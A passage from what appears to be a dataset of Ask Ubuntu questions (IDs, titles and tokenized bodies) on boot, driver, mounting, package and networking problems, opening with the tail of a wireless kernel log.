~~~~~~~~~~~~~ dec 10 17:02:20 user kernel : [ 8763.040405 ] scan done , resume msdu transmission ... dec 10 17:02:20 user kernel : [ 8763.047022 ] cntlenqueueforrecv ( ) : bar-wcid ( 1 ) , tid ( 0 ) dec 10 17:02:20 user kernel : [ 8763.047026 ] bar ( 1 ) : tid ( 0 ) - 03a3:03a5 dec 10 17:02:21 user kernel : [ 8763.898130 ] bimprovedscan ... ... ... ... . resume for bimprovedscan , scan_pending ... ... ... ... .. dec 10 17:02:21 user kernel : [ 8763.898143 ] scanning , suspend msdu transmission ... dec 10 17:02:21 user kernel : [ 8763.900245 ] mlmescanreqaction -- send psm data frame for off channel rm , scan_in_progress=1 ! dec 10 17:02:21 user kernel : [ 8763.921144 ] sync - bbp r4 to 20mhz.l dec 10 17:02:21 user kernel : [ 8763.923339 ] rt35xx : switchchannel # 8 ( rf=8 , pwr0=29 , pwr1=26 , 2t ) , n=0xf4 , k=0x07 , r=0x02 dec 10 17:02:21 user kernel : [ 8763.996019 ] quickdrs : txtotalcnt < = 15 , train back to original rate dec 10 17:02:21 user kernel : [ 8764.066221 ] rt35xx : switchchannel # 9 ( rf=8 , pwr0=29 , pwr1=26 , 2t ) , n=0xf5 , k=0x02 , r=0x02 dec 10 17:02:21 user kernel : [ 8764.210212 ] rt35xx : switchchannel # 10 ( rf=8 , pwr0=29 , pwr1=26 , 2t ) , n=0xf5 , k=0x07 , r=0x02 dec 10 17:02:21 user kernel : [ 8764.215536 ] cntlenqueueforrecv ( ) : bar-wcid ( 1 ) , tid ( 0 ) dec 10 17:02:21 user kernel : [ 8764.215542 ] bar ( 1 ) : tid ( 0 ) - 0457:0452 dec 10 17:02:21 user kernel : [ 8764.244000 ] cntlenqueueforrecv ( ) : bar-wcid ( 1 ) , tid ( 0 ) dec 10 17:02:21 user kernel : [ 8764.244004 ] bar ( 1 ) : tid ( 0 ) - 0459:0456 dec 10 17:02:21 user kernel : [ 8764.253019 ] cntlenqueueforrecv ( ) : bar-wcid ( 1 ) , tid ( 0 ) dec 10 17:02:21 user kernel : [ 8764.253023 ] bar ( 1 ) : tid ( 0 ) - 045c:0458 dec 10 17:02:21 user kernel : [ 8764.256677 ] cntlenqueueforrecv ( ) : bar-wcid ( 1 ) , tid ( 0 ) dec 10 17:02:21 user kernel : [ 8764.256681 ] bar ( 1 ) : tid ( 0 ) - 045c:045b dec 10 17:02:21 user kernel : [ 8764.259785 ] cntlenqueueforrecv ( ) : bar-wcid ( 1 ) , tid ( 0 ) dec 10 17:02:21 user kernel : [ 8764.259788 ] bar ( 1 ) : tid ( 0 ) - 045d:045b dec 10 17:02:21 user kernel : [ 8764.280467 ] cntlenqueueforrecv ( ) : bar-wcid ( 1 ) , tid ( 0 ) dec 10 17:02:21 user kernel : [ 8764.280471 ] bar ( 1 ) : tid ( 0 ) - 045f:045c dec 10 17:02:21 user kernel : [ 8764.282189 ] cntlenqueueforrecv ( ) : bar-wcid ( 1 ) , tid ( 0 ) dec 10 17:02:21 user kernel : [ 8764.282192 ] bar ( 1 ) : tid ( 0 ) - 045f:045e dec 10 17:02:21 user kernel : [ 8764.354204 ] rt35xx : switchchannel # 11 ( rf=8 , pwr0=29 , pwr1=26 , 2t ) , n=0xf6 , k=0x02 , r=0x02 dec 10 17:02:21 user kernel : [ 8764.356408 ] scannextchannel ( ) : send pwa nulldata frame to notify the associated ap ! dec 10 17:02:21 user kernel : [ 8764.498202 ] rt35xx : switchchannel # 12 ( rf=8 , pwr0=29 , pwr1=26 , 2t ) , n=0xf6 , k=0x07 , r=0x02 dec 10 17:02:21 user kernel : [ 8764.642210 ] rt35xx : switchchannel # 13 ( rf=8 , pwr0=30 , pwr1=28 , 2t ) , n=0xf7 , k=0x02 , r=0x02 dec 10 17:02:22 user kernel : [ 8764.790229 ] rt35xx : switchchannel # 14 ( rf=8 , pwr0=30 , pwr1=28 , 2t ) , n=0xf8 , k=0x04 , r=0x02 dec 10 17:02:22 user kernel : [ 8764.934238 ] rt35xx : switchchannel # 11 ( rf=8 , pwr0=29 , pwr1=26 , 2t ) , n=0xf6 , k=0x02 , r=0x02 dec 10 17:02:22 user kernel : [ 8764.935243 ] cntlenqueueforrecv ( ) : bar-wcid ( 1 ) , tid ( 0 ) dec 10 17:02:22 user kernel : [ 8764.935249 ] bar ( 1 ) : tid ( 0 ) - 048e:0485 dec 10 17:02:22 user kernel : [ 8764.936423 ] sync - end of scan , restore to channel 11 , total bss [ 05 ] dec 10 17:02:22 user kernel : [ 8764.936436 ] scannextchannel -- send psm data frame dec 10 17:02:22 user kernel : [ 8764.936440 ] scan done , resume msdu transmission ... dec 10 17:02:22 user kernel : [ 8764.940529 ] rt35xx : switchchannel # 11 ( rf=8 , pwr0=29 , pwr1=26 , 2t ) , n=0xf6 , k=0x02 , r=0x02 dec 10 17:02:22 user kernel : [ 8764.942178 ] cntlenqueueforrecv ( ) : bar-wcid ( 1 ) , tid ( 0 ) dec 10 17:02:22 user kernel : [ 8764.942182 ] bar ( 1 ) : tid ( 0 ) - 0493:048e dec 10 17:02:22 user kernel : [ 8764.942715 ] cntl - all roaming failed , restore to channel 11 , total bss [ 05 ] dec 10 17:02:22 user kernel : [ 8764.948016 ] mmchk - no beacon . restore r66 to the low bound ( 56 ) dec 10 17:02:22 user kernel : [ 8764.948307 ] === > rt_ioctl_giwscan . 5 ( 5 ) bss returned , data- > length = 1111 dec 10 17:02:23 user kernel : [ 8766.048073 ] quickdrs : txtotalcnt < = 15 , train back to original rate dec 10 17:02:23 user kernel : [ 8766.552034 ] quickdrs : txtotalcnt < = 15 , train back to original rate dec 10 17:02:27 user kernel : [ 8770.001180 ] mediastate is connected dec 10 17:02:27 user kernel : [ 8770.001197 ] == > rt_ioctl_giwmode ( mode=2 ) dec 10 17:02:27 user kernel : [ 8770.001201 ] == > rt_ioctl_giwfreq 11 dec 10 17:02:27 user kernel : [ 8770.001219 ] rt28xx_get_wireless_stats -- - > dec 10 17:02:27 user kernel : [ 8770.001223 ] < -- - rt28xx_get_wireless_stats dec 10 17:02:28 user kernel : [ 8771.564020 ] quickdrs : txtotalcnt < = 15 , train back to original rate dec 10 17:02:29 user kernel : [ 8772.064031 ] quickdrs : txtotalcnt < = 15 , train back to original rate
227563	dual boot win 8 fail to boot ubuntu	i have a new pavilion dm1 with pre-installed win 8 , and i want to install ubuntu 12 as a dual boot option . i need a larger partition for ubuntu than wubi will allow . i have downloaded 12.10 and installed onto a usb drive . i changed bios on the laptop to allow booting from usb i enabled legacy boot i resized the partitions using the auto tool i was able to go through the entire installation process . when i rebooted the machine , there was no grub screen nor any option to choose ubuntu . machine booted to win 8 . i tried to reinstall . installation software did see ubuntu and gave me the option to erase ubuntu and reinstall- which i chose . same issue . there seems to be a lot of conflicting information on how to set up ubuntu on win8 . thanks for any help getting this up .
227568	compiz magnifier box does n't work on ubuntu 12.10	i have upgraded my ubuntu to 12.10 and installed compizconfig setting manager to do some custom settings and one of the is enabling magnifier box . but this does n't work , i have tried many shortcut combination but it still does't work . is there any compatibility issue with this feature or what ? please let me know if there is a trick or an issue . the magnifier box will magnify some area withing the box or with an image overlay .
227570	how to i add a drive to a system that already has a software raid on it	i currently have a ubuntu 12.04 server booting off a usb stick and running a raid 0 configuration with 2x 2tb drives . i would now like to add an additional stand alone drive ( not as part of the raid ) . when i add the drive to the server and reboot i get an error indicating that my raid is degraded . is this configuration possible with an existing software raid ? one more note : the 2 x 2tb drives are 6gb sata drives that show as sata in the bios the new drive is a 1tb drive and it shows as scsi in the bios . not sure if this matters but i have seen forum post indicating that ide / sata mixes with raid do not work .
227572	usb external hard drive	i want to put a bootable ubuntu in my usb external hard drive . but , i want to keep storing my files on it and the ubuntu should save my settings there too ( persistent ) . it sounds like a `` persistent live usb '' , but with these differences that i said before . i 've tried `` create a usb stick on windows '' , but the ubuntu was n't saving my settings and files ( and yes , i 've created it with 4gb persistent file size ) . actually i think what i want is not a `` live usb '' . do you guys know how to install ubuntu on a external hd and keeping storing things ? i use windows .
227577	how to set local_code in gitolite	i want to set the local_code variable in my .gitolite.rc . i tried to set $ local_code = `` /home/gitolite/.gitolite/local-code '' ; and the setting from this . but gl-query-rc local_code is empty . the link above says that some packages can handle this variable different . how to set it in ubuntu 12.04 ?
227582	xml2-config is different from the same file on the system	i followed this procedure to restore a previously exported list of packages in a new system . at the end of the procedure , after sudo apt-get dselect-upgrade -y i got this message : [ cut ] lot of output , everything ok [ cut ] errors were encountered while processing : /var/cache/apt/archives/libsensors4_1 % 3a3.3.1-2ubuntu1_i386.deb /var/cache/apt/archives/gcc-4.4-base_4.4.7-1ubuntu2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the full output is available on paste.ubuntu.com . /etc/sources.list content is also available here . then i typed again sudo apt-get dselect-upgrade -y . this is the error : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libxslt1-dev : i386 : depends : libxml2-dev : i386 ( > = 2.6.26 ) but it is not installed e : unmet dependencies . try using -f. and trying to sudo apt-get -f install : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libxml2-dev : i386 the following new packages will be installed : libxml2-dev : i386 0 upgraded , 1 newly installed , 0 to remove and 6 not upgraded . 5 not fully installed or removed . need to get 0 b/761 kb of archives . after this operation , 2,206 kb of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... 372874 files and directories currently installed . ) unpacking libxml2-dev : i386 ( from ... /libxml2-dev_2.7.8.dfsg-5.1ubuntu4.3_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libxml2-dev_2.7.8.dfsg-5.1ubuntu4.3_i386.deb ( -- unpack ) : './usr/bin/xml2-config ' is different from the same file on the system processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/libxml2-dev_2.7.8.dfsg-5.1ubuntu4.3_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) other people had similar problem and i tried to follow this answer , but without being able to solve . can you help me ?
227584	driver for airlink adapter awll6075	does anyone know a ubuntu driver for the airlink adapter awll6075 ? this is not listed in hardware support pages .
227586	snmpd agent sends duplicate traps	i am on ubuntu 10.04.4 lts , and i can not upgrade to a higher version . i have installed the snmpd agent ( net-snmp version 5.4.2.1 ) with an apt-get install snmpd command . when an event occurs which sends a trap , two traps are sent for each such event instead of one . for example , when i shut down the agent with command /etc/init.d/snmpd stop , two shutdown traps are sent to the destination host . if i then start back up the agent with command /etc/init.d/snmpd start , then two cold start traps are sent to the destination host . is this a known issue ? is there a fix for this , or is there a configuration change that is needed to prevent the sending of the duplicate trap ? these are the contents of the /etc/snmp/snmpd.conf file : rocommunity public authtrapenable 1 trap2sink < trap destination hostname > public these are the contents of the /etc/default/snmpd file : # this file controls the activity of snmpd and snmptrapd # mib directories . /usr/share/snmp/mibs is the default , but # including it here avoids some strange problems . export mibdirs=/usr/share/snmp/mibs # snmpd control ( yes means start daemon ) . snmpdrun=yes # snmpd options ( use syslog , close stdin/out/err ) . snmpdopts='-ls3d -lf /dev/null -u snmp -p /var/run/snmpd.pid -c /etc/snmp/snmpd.conf' # snmptrapd control ( yes means start daemon ) . as of net-snmp version # 5.0 , master agentx support must be enabled in snmpd before snmptrapd # can be run . see snmpd.conf ( 5 ) for how to do this . trapdrun=no # snmptrapd options ( use syslog ) . trapdopts='-lsd -p /var/run/snmptrapd.pid' # create symlink on debian legacy location to official rfc path snmpdcompat=yes
227589	12.04 terminal tab color under gnome classic	the tab color for gnome-terminal is different ( light color ) from the system ambiance theme . what can i modify in /usr/share/themes/ambiance/gtk-3.0/gtk-widgets.css in order to get a consistent look for the tab color ? thanks .
227591	unable to mount smb share . `` please select another viewer and try again ''	this do n't think this is the typical , `` i ca n't mount a windows share '' post . i am using stock ubuntu 12.04 . i am pretty sure this is a nautilus issue , but i have reached a dead end . i have one share that i ca n't mount using smb : //server/share via nautilus . i get the following error . error : failed to mount windows share please select another viewer and try again i can mount this share from other machines ( non-ubuntu ) using the same credentials so i know i have perms on the destination share . i can mount other shares on other servers from my ubuntu box so i am pretty sure i have all the smb packages i need on my ubuntu box . to make thing more interesting , if i use smbclient from the command line , i mount this share with no problems from my ubuntu box . so here 's what we know : destination share perms are ok ( no problem accessing from other machines ) smb is setup correctly on ubuntu box ( access other windows shares no problem ) i only get the error when using nautilus smbclient in terminal works , no problem any help would be greatly appreciated . googling turned up simple mount/perms issues , and i do n't think that is what is going on here . let me know if you need more information . hugh update 1 : gvfs-mount smb : //host/share failed with the following error : error mounting location : failed to mount windows share update 2 : john - i tried # 1 and got the same error as above . # 2 is not an option . this is a production share and if i changed the name of the share it would break things for many users . i tried # 3 and got the same select another viewer and try again error . update 3 : i installed a debian guest vm on this box . it can connect to this share without issue . i tried both gvfs-mount from the terminal and i tried it from nautilus . they were both successful . here 's some info on the deb vm : $ uname -a linux debian 2.6.32-5-amd64 # 1 smp sun sep 23 10:07:46 utc 2012 x86_64 gnu/linux $ dpkg -l |grep gvfs ii gvfs 1.6.4-3 userspace $ dpkg -l |grep nautilus ii nautilus 2.30.1-2squeeze1 file manager and graphical shell for gnome i hope this helps a little update 4 looking at the logs was one of the first things i checked . nothing gets logged to syslog with the mount fails . update 5 added share name to existing share and got the same error . nothing in server event logs tested a different share on same server and was able to connect . makes you think it is a perms issue , except i can connect to problematic share from command line via smbclient command . i am not thrilled about the downgrade option
227592	ever since installing ubuntu accomplishments , rssowl wo n't open without crashing . why ?	i 'm running ubuntu 12.04 on an older machine , so i am accustomed to not being able to run resource-heavy apps well , or at all . however , rssowl had been running like a champ up until the moment i installed ubuntu accomplishments . i 'm not the most code savvy , but i do n't see what one of these would have to do with the other . i have already tried removing and re-installing rssowl , to no avail , and i 'd rather not have to uninstall accomplishments , because i love trophies of all kinds . any ideas ?
227594	wubi on win xp - it starts , unpacks , but then ends	i try to start wubi on and older win xp pc . it starts ( seen in task manager ) , unpacks the ( some ? ) files and then ends ... any idea how to start installation ? kind regards - chris edit : original post related to windows installer download now downloaded full ubuntu 12.10 and starting wubi from burnt iso image : same result
227595	update manager error 12.04	i 'm using ubuntu 12.04 . when attempting to run my update manager , it does n't allow any of the updates to be loaded . under `` details '' all it says is `` patch '' . it wo n't even load anything when the partial upgrade option comes up . i thought that this error in update manager would help me , but when i followed the instruction and looked for the `` pubkey '' in terminal , there was none , it said `` badsig '' and `` failed to fetch 11.10 '' instead and my update manager still does n't update anything . i 'm still new to the finer points of ubuntu and could really use some advice . did i do something wrong ? or i need to do a fresh install ?
227596	problem with sound in kubuntu 12.10	i 'm really enjoying kubuntu 12.10 experience , but the problem starts with sound . it was n't here before , but today sound sounds garbled and echoed and wrong . it happens in audacity and vlc . it does n't happen when i test the sound devices nor when i use amarok to play the music files ( but come on , who uses amarok to listen to a random music file , it 's much more natural to use vlc for that ; - ) ) kubuntu/phonon recognizes 2 sound devices : rv770 hdmi audio [ radeon hd 4850/4870 ] digital stereo [ hdmi ] built-in audio analog stereo i know it has to use the second option , and it probably does , but that 's not the case . what i did find out was that i had to rescan for audio devices in audacity ( and probably select `` sysdefault '' ) for it to sound normal . why does it happen ? i 've tried following some other questions , but well . what i have noticed as well , is that the taskbar seems to blink and have an icon appear and disappear many times before for example audacity finally starts . could the sound system crash or something ? i 'm not going to make presumtions on my own , you 're the pros : - )
227597	no sound on kdenlive ubuntu 12.10	i 'm trying to get sound with kdenlive on ubuntu 12.10 . i 've tried every drivers in the kdenlive configurations and i tried to remove and reinstall alsa/pulseaudio but i 've no sound . i 've an error : sdl failed to open audio : no available audio device i searched on google and there are a lot of people getting this error ... can anyone get sound with kdenlive ? thanks .
227598	i get scrambled screen when ubuntu 12.10 strts up or when i start dash home	scrambled screen with ubuntu 12.10 when starts up or when opening dash home
227599	how to use gestures on gnome shell ?	i have installed ubuntu 12.10 on my acer apsire v5 touch , and i want to know hot to activate the gestures on my clickpad in gnome shell , because in unity i can use them with no problems . so , is there a way to use the gestures on gnome shell ? gestures : pinch to zoom move windows with 3 fingers '' natural scroll '' etc ... and if it 's possible to fully use the touch screen , because it fails when i do a click on it .
227600	why i ca n't install packages ? apt-get says that i 'm helding broken packages	i am trying to install my wifi using : sudo apt-get install bcmwl-kernel-source but i get this error : unable to correct problems , you have held broken packages . any ideas ? i am using lubuntu 12.10
227605	how can i install skype ?	respected sir , would you please help me to install skype .
227607	different display and window managers for ubuntu and how to install them	on surfing articles on ubuntu , i came across posts for installing different desktop environments in ubuntu . that got me thinking about different display & window managers they use and i made a list of a few window managers : awesome enlightment fluxbox icewm xfwm ( xfce ) openbox sawfish chromeos ( aura wm rip ) fvwm kdm ( kde ) i would like to install all of these in ubuntu 12.04 . how to do that . got chromeos , need rest . extra : i took a look at joli os and loved their display . only i do n't know its name or if it is available for ubuntu ( though joli os is ubuntu derivative ) . can any one give me that desktop environment or instructions on how to install it ? update got almost all but i need joli os 's display manager .
227611	ruby : problem with updating	i want to use ruby 1.9.1 . the problem i am facing is shown below . i wish someone could help me out . $ uname -a linux almb-pc 2.6.38-15-generic-pae # 66-ubuntu smp tue aug 14 17:45:09 utc 2012 i686 i686 i386 gnu/linux $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=11.04 distrib_codename=natty distrib_description= '' ubuntu 11.04 '' $ sudo apt-get install ruby1.9.1-full reading package lists ... done building dependency tree reading state information ... done ruby1.9.1-full is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 19 not upgraded . $ update-alternatives -- config ruby update-alternatives : error : no alternatives for ruby . $ ruby -v ruby 1.8.7 ( 2010-08-16 patchlevel 302 ) [ i686-linux ]
227614	attempt to mount a filesystem with type ext4 at '/ ' failed	i disengaged all of my internal hardisks then plugged two things : 1 ] 4gb kingston usb made bootable using poweriso & ubuntu 12.10 image file . 2 ] 160gb external wd scorpio hardisk the computer booted normally wth ubuntu asking wither to try or install . i chose install then proceeded towards manual partitioning . all as ext4.. /boot 300mb primary ( sdb/1 ) swap 2000mb primary / 17000mb logical /home 9000mb logical /opt 14000mb logical rest free space ... chose sdb/1 as boot point [ sda corresponds to usb ] proceeded ... installation ran then nasty error didnt allow me to proceed , tried different configurations of partition but to no avail error : attempt to mount a filesystem with type ext4 ... at '/ ' failed plz help me
227615	problem with creating bootable sd-card for pandaboardes	i have followed instructions https : //wiki.ubuntu.com/arm/ to write the image for ubuntu 12.04 . i had already done this before once in the past but with 11.10 ubuntu sever ed . now i would like to write the 12.04 version because is supposed to run fine with openframeworks . i have some problems with my sd-card reader also ( maybe is not a very good one ? ? ) and ca n't follow the instructions listed , id est : zcat ./ubuntu-12.04-preinstalled-desktop-armhf+omap4.img.gz |sudo dd bs=4m of=/dev/sdb ; sudo sync but instead i have to use this : sudo sh -c 'zcat ubuntu-12.04-preinstalled-desktop-armhf+omap4.img.gzz > /dev/sdb ' sync that is more comfortable because i have an output on the screen . but the problem is when i plug the sd-card into my pandaboard and start minicom . this is my output : walter @ walter-rc530-rc730 : ~/scrivania $ sudo minicom -s welcome to minicom 2.5 options : i18n compiled on may 2 2011 , 10:05:24 . port /dev/ttyusb0 press ctrl-a z for help on special keys u-boot spl 2011.12 ( apr 02 2012 - 18:13:04 ) texas instruments omap4460 es1.1 omap sd/mmc : 0 reading u-boot.img reading u-boot.bin mkimage signature not found - ih_magic = ea000014 assuming u-boot.bin .. reading u-boot.bin u-boot 2011.12 ( apr 02 2012 - 18:13:04 ) cpu : omap4460 es1.1 board : omap4 panda i2c : ready dram : 1 gib warning : caches not enabled mmc : omap sd/mmc : 0 using default environment in : serial out : serial err : serial net : no ethernet found . checking for preenv.txt reading preenv.txt ** unable to read `` preenv.txt '' from mmc 0:1 ** hit any key to stop autoboot : 0 reading uenv.txt ** unable to read `` uenv.txt '' from mmc 0:1 ** reading boot.scr 293 bytes read loaded script from boot.scr running bootscript from mmc0 ... # # executing script at 82000000 reading uimage 4434784 bytes read reading uinitrd 6608373 bytes read # # booting kernel from legacy image at 80000000 ... image name : ubuntu kernel image type : arm linux kernel image ( uncompressed ) data size : 4434720 bytes = 4.2 mib load address : 80008000 entry point : 80008000 verifying checksum ... ok # # loading init ramdisk from legacy image at 81600000 ... image name : ubuntu initrd image type : arm linux ramdisk image ( gzip compressed ) data size : 6608309 bytes = 6.3 mib load address : 00000000 entry point : 00000000 verifying checksum ... ok loading kernel image ... ok ok starting kernel ... uncompressing linux ... done , booting the kernel . after those lines nothing happens ... . normally should begin the customization process , but never happens . anyone can give my advice ? honestly i did this not so many times , so maybe i forgot something or made something wrong . maybe my sd-card reader does not work properly ? thanks in advance
227616	remove a previously deselected package to install postgres ?	so i was meant to run add-apt-repository ppa : pitti/postgresql apt-get update apt-get install postgresql libpq-dev but instead i ran without the previous two commands apt-get install postgresql libpq-dev which i then followed with : apt-get -- purge remove postgres apt-get auto-remove and tried to start back up properly from the first step however , my machine is still installing postgres 8.4 instead of 9.2 . how can i get it to stop doing that ? edit : i see that the package is not being fetched ... w : failed to fetch http : //ppa.launchpad.net/pitt/postgresql/ubuntu/dists/lucid/main/binary-i386/packages.gz 404 not found may be a server error that just happens to be live the first time i try to install it . edit 2 : turns out that it is using `` pitt '' instead of `` pitta '' for some reason ... will completely restart . arghh . edit 3 : pitti not pitta
227618	what is an appropriate way to install lustre on a ubuntu 12.10 cluster	i have a 24-nodes cluster installed with ubuntu 12.10 . what is the suggested way to install a relatively new lustre version on such a cluster ?
227621	daemon for moving files between partitions ?	i have a system with ubuntu installed in 20gb and windows in 100 gb , two partitions - each of 100gb using ntfs . while using dc++ ( multiple downloading of big file ) i used to get message that system is running out of memory . is there any way to make a deamon which will be checking the ubuntu partition so that if its used space goes up to a certain amount ( let 's say 18 gb ) it will automatically start a moving file from this drive to another drive ( let 's assume it will pick the file from movie folder or largest media file from this drive to move ) ? or it prompt to ask from user which file to move ? is there any program which can do this for me ? if not , can you suggest something to read so that i could make it ?
227622	what happened to last.fm radio service in rhythmbox ?	my last.fm stations stopped working last week - i assume it is due to their protocol upgrade : we 're writing you to let you know that there will soon be a change to last.fm radio that may affect you . our stats show that you 've listened to radio through an application that uses our old streaming protocol . on 1 december we will deprecate this old protocol , so in some applications radio will no longer work . i updated to the latest version of rhythmbox ( 2.98 ) with the webupd8team ppa , but still no luck . does anybody have this working ? if so , what did you do ?
227624	installing a certificate emitted by comodo on apache ubuntu	i have followed steps outlined in comodo knowledge base edited my /etc/apache2/apache2.conf and /etc/apache2/mods-available/ssl.conf by adding < virtualhost 197.***.** . **:443 > sslengine on sslcertificatefile /etc/ssl/crt/www_mydomain_com.crt sslcertificatekeyfile /etc/ssl/key/www_mydomain_com.key sslcertificatechainfile /etc/ssl/crt/www_mydomain_com.ca-bundle serveradmin info @ mydomain.com servername www.mydomain.com documentroot /var/www/ errorlog /var/www/logs/error.log customlog /var/www/logs/access.log combined < /virtualhost > i also have loadmodule ssl_module /usr/lib/apache2/modules/mod_ssl.so i tested for htts using telnet www.mydomain.com https but its not working . error is telnet : unable to connect to remote host : connection timed out could someone kindly point me to the right direction ?
227632	average memory usage after complete ubuntu 12.04 start up	when it starts up completely , i cas see that about 400-500mb of my 2gb ram is being used . right now that i have only started firefox ( and system monitor ) , i can see that about 1gb of ram is full with about 5 loaded and active tabs and 3 others that are not active ( the 3 tabs are restored from previous session and not loaded ) i have 2gb ram and a 3.7gb swap partition which is not used at all . is that normal ? i really think that there should be something wrong . my system is updated and i had installed a windows 7 before installing ubuntu . it is a core i3 lenovo thinkpad edge 14 '' . any other info you need to know ? just ask .
227636	no wifi on dell vostro 2520 after update to 12.10	i have installed 12.04 on a dell vostro 2520 ( previously 11.10 ) and wifi is gone now but wired network remains . i 've reviewed the other questions and tried this one : and some stuff but no luck yet . the following is the process so far so hopefully someone can help . i have the broadcom bcm43142 chip . i have made sure in the bios that the wlan is turned on , and it appears the laptop does not have a wireless hardware switch , only the keyboard function shortcut which turns bluetooth on and off on the taskbar but there is no lightup of the wireless function on the laptop itself . dell does not appear to have any drivers for ubuntu and google does not appear to be much help : ( perhaps someone can please provide the recovery disk iso that originally came on the hard drive ? thanks in advance ! .
227637	ssh-agent is not used when ssh is launched from panel launcher ( via `gnome-terminal -- command` )	i have everything set up so that after i log in and add proper identity to ssh-agent using ssh-add from a gnome-terminal window , i do not have to enter the passphrase again when i invoke ssh myserver . now i wanted to make it even easier and create a panel launcher that would run gnome-terminal -- command `` ssh myserver '' but while this does invoke what i want , it ignores ssh-agent , i.e . it asks for pass-phrase . and it does so every time , even if i supply the pp , the next time it asks again . what am i doing wrong ? can anybody explain why this does not work ? further notes : running gnome-terminal -- command `` ssh myserver from already open terminal works ok changing ssh myserver part to bash -c `` ssh myserver '' with proper quoting did not help . also using ssh myserver right in the launcher did not help : the pass-phrase prompt was displayed as a simple gui window ( unless i checked `` run in terminal '' option , in which case the behavior was same as described above ) it 's ubuntu 12.04 adding -vvv to both ssh command , here is where the failing ( and asking for pp ) ssh starts to differ from the successful ssh : [ ... ] debug1 : server accepts key : pkalg ssh-rsa blen 279 debug2 : input_userauth_pk_ok : fp 5e : ad:5e:1f:7f : ... debug1 : key_parse_private_pem : pem_read_privatekey failed debug1 : read pem private key done : type < unknown > enter passphrase for key '/home/lennycz/.ssh/id_rsa ' : while the successful ssh says [ ... ] debug1 : server accepts key : pkalg ssh-rsa blen 279 debug2 : input_userauth_pk_ok : fp 5e : ad:5e:1f:7f : ... debug1 : authentication succeeded ( publickey ) . [ ... ] ( and then lot of things apparently unrelated ... ) i have n't found any helpful debug messages around nor anything in system/auth logs .
227641	wavy screen on ubuntu 12.04	i have installed ubuntu 12.04 in a samsung chronos series 7 . this machine has nvidia optimus system ( nvidia 640m plus an intel 4000hd ) . i have bumblebee installed and everything works fine with optirun , hdmi output etc . there is only one small problem : i notice waves on screen ( as if the refresh rate is too low ) . this is more noticeable on dark colors like gray and also on transparencies ( like the dash ) . this is not an hardware problem . on windows everything works fine i also notice that this waves only appear when the `` ubuntu '' logo first shows on the screen i.e . not in grub or bios screen . i have already reinstalled drivers , changed resolution , changed refresh rate on compiz settings , etc . this just keep happening . any tips on this ? thank you .
227651	copying files to zfs mountpoint does n't work - the files are n't actually copied to the other filesystem,	i have 3 x 4 tb disks in a nas that i want to group together and access as if they were one whole 'unit ' of some kind . i also have a 250gb disk containing the os - this is full of films and tv shows currently . i thought zfs sounded good so i created a raidz zpool , after installing the ppa sudo zpool create store raidz /dev/sdb /dev/sdc /dev/sdd and set the mountpoint to /mnt/store sudo zfs set mountpoint=/mnt/store /store checked it was successful - i think it was sudo zfs list name used avail refer mountpoint store 266k 7.16t 170k /mnt/store then i wanted to move over a whole load of files from my home directory . i went to where the to-be-copied folder was ( called media ) and entered sudo cp -r * /mnt/store cp : can not create directory `/mnt/store/media ' : no space left on device it seems like it 's not copying over to the new filesystem i made ( or thought i did ) . i 've never really done this type of thing until a few days ago so may be running before i can walk ... is this not the right way to copy files across ? i 've only used windows before so the idea of mountpoints is a bit mind boggling . i 'm using xbmcbuntu 12 beta 2.0 which is based on 12.04 . will retry with normal ubuntu 12.04 desktop to see if that 's the problem . thanks for the help !
227653	problems updating system : update manager says newest update is 11.10	when i open my update manager i get a window saying : your ubuntu release is not supported anymore . you will not get any further security fixes or critical updates . please upgrade to a later version of ubuntu linux when i close the window it says the newest upgrade is ubuntu 11.10 . when i 'd like to run it it says error ... ? what to do ? thanks !
227654	are my permissions correct for sharing files with windows ?	i have kubuntu 12.04.01 installed on partition /dev/sdb2 of my dual boot computer . /sda1 carries windows xp , xp program files and some data files . /sda2 and /sdb1 carry more data , music and pictures , mostly going back to the bad old windows-only days . i can not ( and do n't want to ) access /sdb2 from xp but can access all files from kubuntu and do most things i want . occasionally , working in linux , i ca n't do what i think i should be possible on files or directories in /sda2 and /sdb1 . the restrictions happen whether i created the file in xp or linux , though they do n't apply if i use a directory in /sdb2 . i suspect that my permissions are not as they should be . one such restriction is that , in dolphin , if i right-click a file and enter properties > permissions , any change is successful only for files in /sdb2 my etc/fstab file ( expanded for me by someone with much greater experience of linux ) is as follows : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb5 during installation uuid=bcc24647-8a34-46d2-afe6-b0f747c18631 / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb6 during installation uuid=ef2d585d-bd09-46e0-ad5e-cf63c6cda913 none swap sw 0 0 /dev/sda1 /media/system ntfs-3g defaults , rw , uid=1000 , gid=1000 , umask=0077 0 0 /dev/sda2 /media/samples ntfs-3g defaults , rw , uid=1000 , gid=1000 , umask=0077 0 0 /dev/sdb1 /media/audio ntfs-3g defaults , rw , uid=1000 , gid=1000 , umask=0077 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 is there something which should be altered here , or is there another file elsewhere ?
227659	gtk native version of amarok	does anybody know of a version of amarok written in gtk ? this is my fave music player but if i install using apt-get i have to install 200mb of kde dependencies . i saw a windows beta version so heres hoping , it would just be nice if i could find a gtk version .
227661	how do i delete the boot passphrase ?	i 'm using ubuntu 12.10 and i set it up to have a password to login , and apparently , i also selected to have a password on boot-up . i went into my bios and made sure start-up/hdd password is turned off , but ubuntu still asks me for a password right when i turn it on , and again when i actually login . i only want to get rid of the boot/start-up password , not the login .
